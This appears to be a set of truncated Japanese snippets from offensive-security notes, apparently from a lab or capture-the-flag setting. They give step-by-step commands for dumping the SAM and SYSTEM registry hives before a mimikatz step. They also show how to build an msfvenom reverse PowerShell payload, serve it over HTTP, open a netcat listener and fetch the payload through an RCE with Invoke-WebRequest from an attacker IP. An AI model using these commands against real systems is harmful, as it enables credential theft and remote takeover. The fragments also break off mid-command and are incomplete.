手順 ターゲット上で管理者でコマンドプロンプトを開き、SYSTEMとSAMデータをコピーする C:\>reg save hklm\sam c:\sam The operation completed successfully. C:\>reg save hklm\system c:\system The operation completed successfully. mimikatzをダウン…

bashが使える。 bash -c “nano filename.txt”

ペイロード作成 $ msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.15.3 LPORT=4444 > aaa.bat $ python3 -m http.server 12345 リスナー作成 $ nc -lnvp 4444 RCEでコード実行 powershell -c "Invoke-WebRequest 'http://10.10.15.3:12345/aaa.bat…